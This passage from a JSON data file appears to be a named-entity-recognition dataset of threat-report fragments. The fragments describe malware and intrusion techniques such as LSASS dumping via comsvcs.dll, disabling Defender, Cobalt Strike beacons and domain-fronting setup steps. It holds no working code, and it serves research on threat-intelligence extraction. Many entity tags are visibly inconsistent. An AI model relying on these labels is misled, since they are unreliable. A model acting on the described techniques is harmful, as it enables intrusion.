"the", "Internet", "Explorer", "application", "icon", "and", "the", "target", "paths", "pointing", "to", "the", "two", "dropped", "batch", "scripts." ], "ner_tags": [ "B-Features", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "three", "more", "Windows", "shortcut", "files", "in", "the", "victim’s", "machine", "startup", "folder," ], "ner_tags": [ "I-Features", "I-Features", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "files", "dropped", "in", "the", "Windows", "startup", "folder", "are", "run" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "launches", "several", "processes" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "heavily", "obfuscated", "with", "random", "symbols", "that", "substitute", "the", "instructions", "during", "the", "run-time", "and", "base64-encoded", "strings." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "alphanumeric", "characters", "and", "the", "special", "character", "“_”", "to", "generate", "a", "random", "name", "and", "creates", "a", "folder", "with", "the", "random", "name", "in", "the", "root", "directory", "of", "the", "victim’s", "machine." ], "ner_tags": [ "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "the", "compiled", "AutoIt", "script" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "evade", "detection" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "encodes", "the", "email", "addresses", "in", "the", "“.Outlook”", "file", "to", "a", "data", "stream" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decodes", "the", "base64-encoded", "strings", "and", "initializes", "them" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "the", "encrypted" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypt" ], "ner_tags": [ "O" ] }, { "tokens": [ "decryption", "function", "decrypts", "the", "URL", "pointing", "to", "the", "attacker-controlled", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malicious", "ZIP", "file", "is", "deleted." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deleting", "the", "“fb”", "folder", "to", "cover", "its", "paths", "and", "avoid", "detection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "writes", "the", "path", "of", "the", "executable", "file,", "“_upyqta2_Ji7.exe”,", "to", "the", "class’s", "registry", "key", "“HKEY_CURRENT_USER\\software\\Classes\\ms-settings\\shell\\open\\command”" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "screenshot", "capturing" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "capturing", "screenshots," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "capturing", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "anti-virus", "software", "information" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Checks", "for", "the", "existence", "of", "the", "anti-virus", "products", "such", "as", "AVG", "and", "Avast", "by", "checking", "for", "the", "DLLs", "avghookx.dll,", "avghooka.dll", "and", "snxhk.dll" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "O", "B-Way" ] }, { "tokens": [ "exfiltrated", "to", "the", "attacker-controlled", "server", "through", "an", "HTTP", "POST", "request", "to", "the", "URL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrates", "the", "email", "address", "to", "the", "C2", "server", "using", "an", "HTTP", "POST", "request" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrate", "contacts’", "email", "addresses" ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "encoded", "email", "addresses", "are", "exfiltrated" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "checking", "if", "a", "file", "on", "the", "victim’s", "filesystem", "exists", "and", "gets", "the", "file’s", "attributes,", "collecting", "size", "and", "version", "information," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "looks", "for", "the", "Outlook", "data", "files", "from", "the", "victim", "profile’s", "Outlook", "application", "data", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enumerates", "all", "folders", "and", "emails", "in", "the", "victim’s", "Outlook", "data", "file" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collect", "login", "data", "from", "the", "Google", "Chrome", "user", "profile", "folders" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "extracts", "email", "addresses", "from", "the", "emails’", "sender,", "recipients,", "CC", "and", "BCC", "fields." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "SQL", "queries", "to", "produce", "the", "database", "tables", "to", "store", "the", "stolen", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "added", "to", "the", "email", "address", "collection", "array." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "writes", "the", "extracted", "email", "addresses", "from", "the", "array", "to", "a", "file", "called", "“.Outlook”", "created", "by", "the", "script", "in", "the", "roaming", "user", "profile’s", "Microsoft", "application", "data", "folder." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Checks", "the", "registry", "keys", "to", "detect", "virtual", "environments", "such", "as", "VMWare,", "Virtual", "Box,", "Wine,", "Microsoft", "Hyper-V", "or", "Windows", "Virtual", "PC." ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "used", "impacket", "to", "execute", "Windows", "Management", "Instrumentation", "(WMI)", "to", "achieve", "command", "execution", "on", "other", "systems", "present", "in", "the", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "examples", "of", "the", "command", "line", "syntax", "used", "for", "the", "performance", "of", "this", "activity" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "adversary", "using", "Windows", "Batch", "files" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "performed", "via", "the", "following", "command-line", "syntax" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "command-line", "syntax", "used" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "command-line", "syntax", "was", "observed", "being", "used" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Windows", "Command", "Processor", "was", "used" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attacker", "also", "used", "the", "\"proxychains\"", "utility,", "which", "is", "often", "employed", "to", "redirect", "network", "traffic" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "of", "utilities", "such", "as", "proxychains" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "adversary", "leveraging", "a", "Windows", "Service", "to", "execute", "PowerShell", "to", "stay", "persistent", "in", "the", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Windows", "service", "was", "configured", "with", "the", "following", "options:Service", "Type:", "user", "mode", "service", "Service", "Start", "Type" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "PowerShell", "being", "executed", "was", "Base64", "encoded" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decoded", "PowerShell", "instructions" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypting," ], "ner_tags": [ "O" ] }, { "tokens": [ "Disabling", "PowerShell", "logging" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Disabling", "this", "security", "control" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "to", "disable", "remote", "administration", "restrictions", "to", "facilitate", "lateral", "movement", "and", "privilege", "escalation", "activities" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attacker", "disabling", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Downloading,", "decrypting,", "and", "executing", "a", "backdoor", "payload", "from", "an", "attacker-controlled", "server" ], "ner_tags": [ "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "attacker", "leveraging", "Windows", "Remote", "Desktop", "Connections", "to", "pivot", "to", "additional", "systems", "in", "the", "environment." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attacker", "also", "attempted", "to", "execute", "PowerShell", "scripts", "on", "remote", "systems", "in", "the", "environment", "while", "moving", "system-to-system" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "adversaries", "copied", "and", "executed", "the", "aforementioned", "PowerShell", "script", "on", "multiple", "systems", "across", "the", "environment" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comsvcs.dll", "is", "a", "well-known", "way", "to", "extract", "LSASS", "(Local", "Security", "Authority", "Subsystem", "Service)", "data" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "invoking", "comsvcs.dll", "with", "rundll32.exe,", "an", "adversary", "can", "create", "a", "dump", "of", "any", "process" ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "utilizing", "comsvcs.dll" ], "ner_tags": [ "O", "B-Way" ] }, { "tokens": [ "invoking", "comsvcs.dll", "with", "rundll32.exe," ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "adversary", "was", "also", "observed", "remotely", "modifying", "the", "Windows", "Registry", "on", "remote", "systems" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Org", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "by", "modifying", "the", "Windows", "Registry", "on", "compromised", "systems." ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "attempting", "to", "exfiltrate", "sensitive", "information", "over", "SMB", "(TCP/445)", "directly", "from", "a", "compromised", "domain", "controller." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actor", "is", "actively", "exploiting", "the", "so-called", "PrintNightmare", "vulnerability", "(CVE-2021-1675", "/", "CVE-2021-34527)", "in", "Windows'", "print", "spooler", "service", "to", "spread", "laterally", "across", "a", "victim's", "network" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Features", "B-Exp", "B-Features", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "screen", "capture" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "Microsoft", "SharePoint", "vulnerability", "CVE-2019-0604", "was", "used", "to", "deliver", "web", "shells" ], "ner_tags": [ "O", "O", "B-Exp", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exploited", "the", "Microsoft", "SharePoint", "vulnerability", "CVE-2019-0604", "to", "install", "web", "shells" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "running", "native", "Windows", "commands", "on", "compromised", "servers," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "operators", "made", "a", "consistent", "effort", "to", "delete", "these", "tools", "and", "remove", "any", "residual", "forensic", "artifacts", "from", "compromised", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "consistently", "cleaned", "up", "evidence", "of", "their", "intrusion", "after", "gaining", "access", "to", "a", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "moved", "laterally", "and", "deployed", "their", "signature", "malware" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "this", "access", "to", "deploy", "and", "remotely", "execute", "FOCUSFJORD", "on", "their", "primary", "target." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "operators", "deleted", "tools", "used", "for", "credential", "harvesting", "and", "internal", "reconnaissance" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "to", "delete", "any", "remaining", "FOCUSFJORD", "forensic", "evidence,", "including", "files", "on", "disk,", "configuration", "data", "encrypted", "in", "the", "registry,", "and", "related", "services", "and", "registry", "keys", "used", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "writes", "its", "encrypted", "C2", "configuration", "into", "the", "system’s", "registry" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "writes", "its", "configuration", "to", "registry,", "this", "value", "is", "set", "to", "“default”", "and", "is", "later", "manually", "changed", "by", "the", "actor" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "the", "operators", "were", "able", "to", "access", "their", "primary", "target", "via", "RDP", "connections" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "operators", "were", "able", "to", "access", "their", "primary", "target", "via", "RDP", "connections", "from", "a", "trusted", "third", "party", "using", "stolen", "credentials" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "configured", "to", "proxy", "C2", "traffic" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "configured", "to", "proxy", "C2", "traffic" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "other", "victim", "networks", "to", "proxy", "their", "C2", "instructions,", "likely", "to", "minimize", "the", "risk", "of", "detection", "and", "blend", "in", "with", "normal", "network", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "acting", "as", "proxies", "to", "relay", "communications", "to", "their", "C2", "servers." ], "ner_tags": [ "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "usually", "to", "the", "victim’s", "domain", "name" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "read", "and", "decrypt", "those", "registry", "key", "values", "for", "proper", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "needs", "to", "read", "and", "decrypt", "those", "registry", "key", "values" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "obfuscate", "the", "source", "of", "the", "activity." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "tool", "called", "“anti.exe”", "to", "stop", "Windows", "Update", "service", "and", "terminate", "EDR", "and", "Antivirus", "related", "services." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "leverages", "spear-phishing", "and", "tries", "to", "trick", "the", "victims", "into", "opening", "malicious", "documents" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "They", "used", "multiple", "malicious", "PDFs", "and", "MS", "Office", "documents", "during", "the", "campaign." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-OffAct" ] }, { "tokens": [ "they", "use", "tools", "such", "as", "Mimikatz", "to", "dump", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "and", "remote", "monitoring", "software", "such", "as", "ScreenConnect,", "Remote", "Utilities,", "and", "eHorus." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "they", "added", "a", "new", "tool", "for", "remote", "access,", "Syncro,", "to", "their", "arsenal." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "B-Way", "B-Way", "O", "O", "O" ] }, { "tokens": [ "It", "disguises", "itself", "as", "a", "legitimate", "Google", "Update", "executable." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "It", "collects", "the", "victim’s", "username" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O" ] }, { "tokens": [ "computer", "name" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "and", "IP", "address" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Domain", "fronting", "is", "another", "method", "for", "concealing", "communication", "between", "the", "endpoint", "and", "the", "command", "and", "control", "servers." ], "ner_tags": [ "B-Tool", "B-Way", "O", "O", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "purpose", "of", "domain", "fronting", "is", "to", "connect", "to", "a", "restricted", "host", "while", "pretending", "to", "communicate", "with", "an", "allowed", "host" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "masks", "your", "traffic", "to", "a", "certain", "website", "by", "masquerading", "it", "as", "a", "different", "domain." ], "ner_tags": [ "I-Features", "I-Features", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Domain", "fronting", "was", "mostly", "used", "by", "web", "services", "to", "bypass", "censorship", "in", "several", "countries", "that", "restricted", "traffic" ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp" ] }, { "tokens": [ "attackers", "have", "started", "using", "this", "technique", "to", "hide", "their", "malicious", "infrastructure", "behind", "legitimate", "domains" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "domain", "fronting", "possible", "by", "allowing", "the", "operators", "to", "configure", "related", "settings", "via", "the", "malleable", "C2", "profiles" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Setup", "the", "CDN", "service", "to", "create", "a", "new", "CDN", "endpoint", "and", "redirect", "traffic", "to", "your", "domain." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-SamFile", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Identify", "a", "domain", "that", "uses", "the", "same", "CDN", "to", "ensure", "that", "the", "traffic", "will", "be", "forwarded", "to", "the", "correct", "resource." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Setup", "a", "profile", "to", "facilitate", "domain", "fronting" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "legitimate", "website", "will", "forward", "the", "traffic", "through", "the", "CDN", "to", "the", "original", "destination", "according", "to", "the", "host", "header." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "malleable", "C2", "profiles", "are", "configured", "to", "allow", "domain", "fronting", "using", "the", "Fastly", "and", "AzureEdge", "CDNs" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "domain", "fronting", "appears", "to", "be", "used", "by", "threat", "actors." ], "ner_tags": [ "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "I-HackOrg", "O" ] }, { "tokens": [ "Attackers", "can", "use", "legitimate", "domains", "that", "are", "registered", "under", "the", "same", "CDN", "provider." ], "ner_tags": [ "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "HTTP/HTTPS", "C2", "traffic" ], "ner_tags": [ "B-Way", "O", "O" ] }, { "tokens": [ "HTTP", "communication", "between", "the", "Beacon", "and", "the", "Cobalt", "Strike", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "other", "compromised", "host", "running", "the", "parent", "HTTP", "Beacon" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "Parent", "Beacon" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "customized", "for", "the", "HTTP-POST", "Block" ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Encrypting", "and", "encoding", "the", "data", "with", "XOR", "mask", "and", "random", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "use", "their", "beacon", "sessions", "to", "establish", "RDP", "access" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "I-Way", "I-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "attackers", "was", "to", "establish", "a", "Remote", "Desktop", "session" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "establishing", "a", "RDP", "session,", "including", "the", "ability", "to", "navigate", "using", "a", "graphical", "environment", "and", "easily", "move", "laterally", "once", "the", "necessary", "access", "has", "been", "granted" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attacker’s", "Kali", "Linux", "host", "to", "RDP", "into", "our", "target’s", "environment" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "RDP", "into", "the", "target", "host" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "beacon", "acts", "as", "the", "intermediary", "to", "facilitate", "the", "Remote", "Desktop", "session" ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMB", "beacons", "open", "a", "local", "port", "on", "the", "target", "host", "and", "listen", "for", "incoming", "communication", "from", "a", "parent", "beacon" ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMB", "beacons", "are", "mostly", "used", "to", "make", "network", "detection", "harder", "and", "to", "get", "access", "to", "isolated", "systems", "where", "communication", "to", "the", "internet", "is", "prohibited" ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "SMB", "Beacon", "is", "communicating", "over", "the", "network", "with", "a", "parent", "Beacon", "using", "named", "pipes." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "see", "the", "named", "pipe", "created", "that", "we", "specified", "on", "the", "Cobalt", "Strike", "interface", "when", "we", "created", "the", "SMB", "listener." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "RDP", "into", "the", "target", "host", "using", "reverse", "proxy" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "using", "reverse", "proxy" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "reverse", "proxy" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Reverse", "Proxy", "using", "Cobalt", "Strike", "Beacon" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "ability", "to", "run", "a", "SOCKS", "proxy", "server", "on", "the", "team", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "This", "enables", "the", "operators", "to", "setup", "a", "listening", "port", "and", "leverage", "it", "to", "relay", "traffic", "to", "and", "from", "the", "open", "beacon", "session" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attackers", "take", "advantage", "of", "this", "technique", "using", "proxychains" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "employ", "proxychains", "from", "the", "attacker’s", "Kali", "Linux", "host" ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O" ] }, { "tokens": [ "via", "reverse", "proxy." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "can", "be", "configured", "as", "a", "proxy" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "use", "their", "beacon", "sessions", "to", "establish", "RDP", "access", "through", "a", "reverse", "proxy" ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "victim’s", "hostname", "is", "captured", "in", "this", "logon", "event" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "execute", "the", "command", "systeminfo", "on", "the", "compromised", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "took", "148", "packets", "containing", "DNS", "requests", "and", "responses", "to", "finish", "the", "task", "and", "send", "back", "the", "data", "to", "the", "Cobalt", "Strike", "Server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 